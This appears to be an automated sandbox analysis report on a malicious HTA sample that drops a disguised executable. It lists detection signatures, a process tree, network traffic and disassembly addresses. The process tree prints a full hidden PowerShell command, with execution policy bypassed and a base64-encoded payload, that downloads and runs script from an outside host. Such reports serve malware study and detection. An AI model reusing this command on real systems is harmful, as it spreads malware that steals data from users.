Edit tour

Windows Analysis Report
client_1.hta

Overview

General Information

Sample Name:	client_1.hta
Analysis ID:	1320444
MD5:	57d3eb665f1e9e6a19f278baabd49e7b
SHA1:	44566a9d716e6abd0304544dd88d245fea990882
SHA256:	4380de3cba18880ef72d2bc73ec84ee6f9f27b55d635a81ab8d40d488f59303d
Tags:	agenziaentratealternativestagegozihtaisfbursnif
Infos:

Detection

Score:	80
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Yara detected Powershell download and execute

PowerShell case anomaly found

Bypasses PowerShell execution policy

Encrypted powershell cmdline option found

Suspicious powershell command line found

Contains functionality to modify clipboard data

Powershell drops PE file

Queries the volume information (name, serial number etc) of a device

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to query locales information (e.g. system language)

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

May sleep (evasive loops) to hinder dynamic analysis

Uses code obfuscation techniques (call, push, ret)

PE file contains sections with non-standard names

Detected potential crypto function

Contains functionality to query CPU information (cpuid)

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to read the clipboard data

HTTP GET or POST without a user agent

Contains functionality which may be used to detect a debugger (GetProcessHeap)

IP address seen in connection with other malware

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Searches for the Microsoft Outlook file path

Extensive use of GetProcAddress (often used to hide API calls)

Drops PE files

Contains functionality to read the PEB

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to detect virtual machines (SLDT)

Contains functionality to retrieve information about pressed keystrokes

Dropped file seen in connection with other malware

Found large amount of non-executed APIs

Creates a process in suspended mode (likely to inject code)

Contains functionality for read data from the clipboard

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Classification

Process Tree

System is w10x64

mshta.exe (PID: 6472 cmdline: mshta.exe "C:\Users\user\Desktop\client_1.hta" MD5: 15566C33101B38B422709CA3E5819FFA)

cmd.exe (PID: 6564 cmdline: "C:\Windows\System32\cmd.exe" /c powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 7366FBEFE66BA0F1F5304F7D6FEF09FE)

powershell.exe (PID: 6620 cmdline: powErshEll -nop -w hiddEn -Ep bypass -Enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AYwBvAG0AbQB1AG4AaQBjAGEAbABpAG4AawAuAGMAbwBtAC8AaQBuAGQAZQB4AC4AcABoAHAAIgApAA== MD5: 3F92A35BA26FF7A11A49E15EFE18F0C2)

sxnoX.exe (PID: 6780 cmdline: "C:\Users\user\AppData\Local\Temp\sxnoX.exe" MD5: 47E88C8E89C1E99CA76EC3D8BAB8C3D8)

cleanup

Yara Signatures

Other

Source	Rule	Description	Author	Strings
amsi32_6620.amsi.csv	JoeSecurity_PowershellDownloadAndExecute	Yara detected Powershell download and execute	Joe Security

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: http://pesterbdd.com/images/Pester.png

URL Reputation: Label: malware

Source: unknown

HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49693 version: TLS 1.2

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001D8220 FindFirstFileA,FindClose,FindWindowA,	4_2_001D8220
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00188D50 GetWindowsDirectoryA,_strlen,FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,GetCurrentProcessId,	4_2_00188D50
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001B4E80 FindFirstFileA,FindClose,	4_2_001B4E80
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00219652 FindFirstFileExW,	4_2_00219652
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00219703 FindFirstFileExW,FindNextFileW,FindClose,FindClose,	4_2_00219703
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001A9C60 GetProcAddress,FindFirstFileA,CloseHandle,	4_2_001A9C60

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then cmp dword ptr [ecx], eax	4_2_00190100
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then cmp dword ptr [ecx], eax	4_2_00190100
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	4_2_001DE240
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then push 00000000h	4_2_001E2530
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then lea ecx, dword ptr [eax+01h]	4_2_001E8550
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then push ecx	4_2_00198670
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then movzx ebp, byte ptr [edi]	4_2_001CA6D0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then push ecx	4_2_001C4860
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov byte ptr [eax+esi*4+07h], 00000004h	4_2_001648D7
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov ecx, ebp	4_2_001D0960
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then sub edx, 01h	4_2_0017AA50
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then push 00000001h	4_2_001ACA90
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then movzx eax, byte ptr [ebp+edi+01h]	4_2_0019CB00
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then push ebx	4_2_001E2E10
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then push 00000000h	4_2_001B8EA0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov dword ptr [esp+0Ch], edx	4_2_001DEEE0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov edi, edx	4_2_001C9090
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then movzx ebx, byte ptr [ecx+ebp]	4_2_001DD0D0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov eax, dword ptr [edi+ebp*4+04h]	4_2_00183130
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then add edi, 01h	4_2_00177150
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov ecx, dword ptr [edi+04h]	4_2_001C91B0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then cmp byte ptr [edi+ebx], 0000002Ch	4_2_001AD200
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov ecx, dword ptr [eax-08h]	4_2_00185230
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov ecx, edx	4_2_0019B280
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then push ebx	4_2_00193470
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov ecx, dword ptr [esp+eax*8]	4_2_001ED4E0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov eax, dword ptr [esi+1Ch]	4_2_0019F550
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then sub esi, 03h	4_2_001D1630
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then push dword ptr [edi-4Ch]	4_2_001B3700
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then push dword ptr [edi+10h]	4_2_001C3790
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then movzx ebx, word ptr [ecx+edx*2]	4_2_001E57D0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov esi, 00000000h	4_2_001CF850
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov esi, 00000000h	4_2_001CF970
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov dword ptr [esp+04h], ecx	4_2_001DD970
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov edi, dword ptr [ecx+18h]	4_2_0016F9B0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then add esp, 04h	4_2_001BDA90
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then movzx edi, word ptr [ecx+edx*2]	4_2_001E5AC0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov eax, dword ptr [00261768h]	4_2_00165B50
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then movzx eax, cl	4_2_0019DC40
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov ecx, esi	4_2_0016FCD0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov edi, dword ptr [esp]	4_2_001BDD10
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then call 0019B230h	4_2_001A9DE0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov ecx, dword ptr [esp+18h]	4_2_00199F90
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4x nop then mov eax, dword ptr [edi+ebx*4+04h]	4_2_00181F80

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.79/w32/putty.exe HTTP/1.1Host: the.earth.li
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: communicalink.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 93.93.131.124 93.93.131.124

Source: unknown	Network traffic detected: HTTP traffic on port 49694 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49694
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: powershell.exe, 00000003.00000002.910271375.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004B8D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.00000000049E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://communicalink.com
Source: powershell.exe, 00000003.00000002.910271375.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://communicalink.com/index.php
Source: powershell.exe, 00000003.00000002.910271375.00000000049E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://communicalink.com/index.phpP
Source: powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: sxnoX.exe.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
Source: sxnoX.exe.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
Source: powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: sxnoX.exe.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
Source: sxnoX.exe.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
Source: powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: powershell.exe, 00000003.00000002.913678336.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	String found in binary or memory: http://ocsp.comodoca.com0
Source: powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	String found in binary or memory: http://ocsp.sectigo.com0
Source: powershell.exe, 00000003.00000002.910271375.00000000049E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.910271375.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.910271375.0000000004CF0000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://the.earth.li
Source: powershell.exe, 00000003.00000002.910271375.00000000049E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.919764732.0000000008302000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.microsoft.c
Source: powershell.exe, 00000003.00000002.919764732.0000000008302000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://www.mioft.
Source: powershell.exe, 00000003.00000002.910271375.0000000004891000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000003.00000002.913678336.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.913678336.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.913678336.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.910271375.00000000049E6000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.913678336.00000000058FD000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	String found in binary or memory: https://sectigo.com/CPS0
Source: powershell.exe, 00000003.00000002.910271375.0000000004CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.eart8f
Source: powershell.exe, 00000003.00000002.910271375.0000000004ACC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004CBE000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li
Source: powershell.exe, 00000003.00000002.910271375.0000000004B03000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D0A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004C96000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004AFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/0.79/w32/putty.exe
Source: powershell.exe, 00000003.00000002.910271375.0000000004CBE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004C96000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.li/~sgtatham/putty/latest/w32/putty.exe
Source: powershell.exe, 00000003.00000002.910271375.0000000004D0E000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://the.earth.liD~
Source: sxnoX.exe, sxnoX.exe, 00000004.00000003.907920223.0000000003251000.00000004.00000020.00020000.00000000.sdmp, sxnoX.exe, 00000004.00000002.2067160103.0000000000227000.00000002.00000001.01000000.0000000B.sdmp, sxnoX.exe, 00000004.00000000.906593433.0000000000227000.00000002.00000001.01000000.0000000B.sdmp, sxnoX.exe.3.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/
Source: powershell.exe, 00000003.00000002.910271375.0000000004AFB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D63000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D52000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.910271375.0000000004D06000.00000004.00000800.00020000.00000000.sdmp, sxnoX.exe.3.dr	String found in binary or memory: https://www.chiark.greenend.org.uk/~sgtatham/putty/0

Source: unknown

DNS traffic detected: queries for: communicalink.com

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_001968F0 recv,accept,WSAGetLastError,closesocket,recv,ioctlsocket,WSAGetLastError,recv,WSAGetLastError,

4_2_001968F0

Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/latest/w32/putty.exe HTTP/1.1Host: the.earth.liConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /~sgtatham/putty/0.79/w32/putty.exe HTTP/1.1Host: the.earth.li
Source: global traffic	HTTP traffic detected: GET /index.php HTTP/1.1Host: communicalink.comConnection: Keep-Alive

Source: unknown

HTTPS traffic detected: 93.93.131.124:443 -> 192.168.2.3:49693 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to modify clipboard data

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00166150 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,		4_2_00166150
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00167490 WideCharToMultiByte,GlobalAlloc,GlobalAlloc,GlobalAlloc,GlobalLock,GlobalLock,WideCharToMultiByte,GlobalFree,GlobalFree,GlobalUnlock,GlobalFree,GlobalFree,GlobalFree,WideCharToMultiByte,GlobalAlloc,GlobalLock,GlobalUnlock,GlobalUnlock,GlobalUnlock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,SetClipboardData,SetClipboardData,RegisterClipboardFormatA,SetClipboardData,CloseClipboard,GlobalFree,GlobalFree,GlobalFree,SendMessageA,		4_2_00167490

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_00169D30 OpenClipboard,GetClipboardData,GetClipboardData,SendMessageA,CloseClipboard,

4_2_00169D30

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_0016A960 GetKeyboardState,

4_2_0016A960

Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Code function: 4_2_00166150 GlobalAlloc,GlobalLock,GlobalUnlock,SendMessageA,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,SendMessageA,GlobalFree,

4_2_00166150

System Summary

Powershell drops PE file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\AppData\Local\Temp\sxnoX.exe

Jump to dropped file

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_079DDB40	3_2_079DDB40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_079DDB40	3_2_079DDB40
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07CB85C8	3_2_07CB85C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07CB85C8	3_2_07CB85C8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0820D6C0	3_2_0820D6C0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08200024	3_2_08200024
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0820D6B0	3_2_0820D6B0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08209780	3_2_08209780
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08209790	3_2_08209790
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_085F3CE0	3_2_085F3CE0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_085F2BD8	3_2_085F2BD8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_085F73B8	3_2_085F73B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_085F6540	3_2_085F6540
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_085F5538	3_2_085F5538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_085F7DC8	3_2_085F7DC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_085F7DB8	3_2_085F7DB8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_085FE6D8	3_2_085FE6D8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_085FE6E8	3_2_085FE6E8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08601BC8	3_2_08601BC8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0863C548	3_2_0863C548
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0863D5F0	3_2_0863D5F0
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0863C080	3_2_0863C080
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0863C538	3_2_0863C538
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0863D760	3_2_0863D760
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0863D70F	3_2_0863D70F
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08636FE8	3_2_08636FE8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0866B608	3_2_0866B608
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0866F6E5	3_2_0866F6E5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_087108F8	3_2_087108F8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08711268	3_2_08711268
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08713AE9	3_2_08713AE9
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_087125B8	3_2_087125B8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0871C888	3_2_0871C888
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08719180	3_2_08719180
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08718A60	3_2_08718A60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0871BB60	3_2_0871BB60
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_0871546A	3_2_0871546A
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_087125A8	3_2_087125A8
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08719F58	3_2_08719F58
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08747A48	3_2_08747A48
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_08639D19	3_2_08639D19
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07CB0040	3_2_07CB0040
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Code function: 3_2_07CB0039	3_2_07CB0039
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001F6020	4_2_001F6020
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00180090	4_2_00180090
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00172080	4_2_00172080
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001E60D0	4_2_001E60D0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001FE0E0	4_2_001FE0E0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001CA150	4_2_001CA150
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00206140	4_2_00206140
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DE1A0	4_2_001DE1A0
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001E8230	4_2_001E8230
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001DE240	4_2_001DE240
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_00176260	4_2_00176260
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_0017E280	4_2_0017E280
Source: C:\Users\user\AppData\Local\Temp\sxnoX.exe	Code function: 4_2_001C02B0	4_2_001C02B0
